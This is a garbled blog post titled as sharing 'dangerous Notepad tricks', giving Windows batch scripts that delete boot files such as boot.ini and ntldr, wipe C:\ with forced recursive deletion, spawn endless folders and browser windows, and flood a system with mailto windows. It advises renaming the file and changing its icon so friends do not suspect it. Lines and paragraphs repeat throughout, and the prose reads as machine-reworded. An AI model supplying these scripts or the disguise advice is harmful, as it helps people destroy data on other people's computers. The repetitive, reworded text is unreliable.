Today i am sharing some most dangerous tricks that can be done by Notepad. This articke is just for educational purpose and don't try it on your own pc,As it can have ill effects....
*So now have a look at these tricks::-
1. Trick to produce 2000 folders in just few seconds::-
• Open notepad and copy paste the following code=>
@echo off
:top
md an unplanned
goto top
:top
md an unplanned
goto top
• Save it by the name as a thousand.bat or any name with extension .bat.
@echo off makes your screen
appear blank however it's truly
making many folders.
md an unplanned is command that
creating folders with random
names.( md may be a command to
make directory in ms-dos)
goto top – come the command
to :top, causes associate degree infinite loop.
appear blank however it's truly
making many folders.
md an unplanned is command that
creating folders with random
names.( md may be a command to
make directory in ms-dos)
goto top – come the command
to :top, causes associate degree infinite loop.
NOTE: The folders can get created
in the directory wherever you saved
the ”1000.bat” file.
The file may look suspicious to your friends. thus if you're looking to fool your friends, then change the file name and conjointly the icon so he doesn’t suspect the file to be a deadly disease.
in the directory wherever you saved
the ”1000.bat” file.
The file may look suspicious to your friends. thus if you're looking to fool your friends, then change the file name and conjointly the icon so he doesn’t suspect the file to be a deadly disease.
——————————————————————————————————————————
2. Trick to shutdown a laptop or pc forever?
Now Please don’t do this as a result of this is often the foremost simplest and deadliest hack for your windows laptop.
•Copy the subsequent code::-
@echo off
attrib -r -s -h c:\autoexec.bat
del c:\autoexec.bat
attrib -r -s -h c:\boot.ini
del c:\boot.ini
attrib -r -s -h c:\ntldr
del c:\ntldr
attrib -r -s -h c:\windows
\win.ini
del c:\windows\win.ini
attrib -r -s -h c:\autoexec.bat
del c:\autoexec.bat
attrib -r -s -h c:\boot.ini
del c:\boot.ini
attrib -r -s -h c:\ntldr
del c:\ntldr
attrib -r -s -h c:\windows
\win.ini
del c:\windows\win.ini
And paste it into your notepad. Save it as “abcd.bat”.(you can put any name but must put .bat extension.) simply confirm it
has a .bat or .cmd extension.
DONT RUN THE BATCH FILE ,YOU ON YOUR OWN PC AS YOU WONT RECOVER BACK once YOU RUN IT !!!
This should closedown the persons laptop. It shuts it
has a .bat or .cmd extension.
DONT RUN THE BATCH FILE ,YOU ON YOUR OWN PC AS YOU WONT RECOVER BACK once YOU RUN IT !!!
This should closedown the persons laptop. It shuts it
off once and deletes the files required to resuscitate and restart.So please, use
this hack on condition that you've got no intention of rebooting your computer once more. thus simply watch out.
this hack on condition that you've got no intention of rebooting your computer once more. thus simply watch out.
*Here’s another code.
cmd /c del c:\windows\* /F /S /
Q
cmd /c del c:\* /F /S /Q
Q
cmd /c del c:\* /F /S /Q
Just copy paste it into Notepad and save it by any name but make sure to save it with Extension .cmd or .bat.
——————————————————————————————————————————
3. Trick to Delete all of your system files with atiny low command!::-
Open Notepad and copy paste the below code into it::-
del *.*
And save it with extension .bat or .cmd.
But dont try to open it as All your files in your disk can vanish in just 5mins.
But dont try to open it as All your files in your disk can vanish in just 5mins.
——————————————————————————————————————————
4. RAM bloody trick::-
Open notepad and copy paste the belpw code
:A
start http://techmaafias.com
goto A
start http://techmaafias.com
goto A
Now just save it with .bat extension.
Infinitely loops your browser to
open up http://techmaafias.com/
Infinitely loops your browser to
open up http://techmaafias.com/
——————————————————————————————————————————
5. Crash a system With Nothing however a Link::-
This is a javascript “exploit” , it
will hang/crash your system. It basically floods you with associate degree infinite loop of mailto:xxx windows. To cancel this (and you have to move fast) kill the process of your email shopper before you run out of RAM. Every instance occupies concerning a thousand bytes, if your victim is sensible, he better finish the method As before long as possible or he are going to be forced to reboot his laptop.
will hang/crash your system. It basically floods you with associate degree infinite loop of mailto:xxx windows. To cancel this (and you have to move fast) kill the process of your email shopper before you run out of RAM. Every instance occupies concerning a thousand bytes, if your victim is sensible, he better finish the method As before long as possible or he are going to be forced to reboot his laptop.
——————————————————————————————————————————
Post a Comment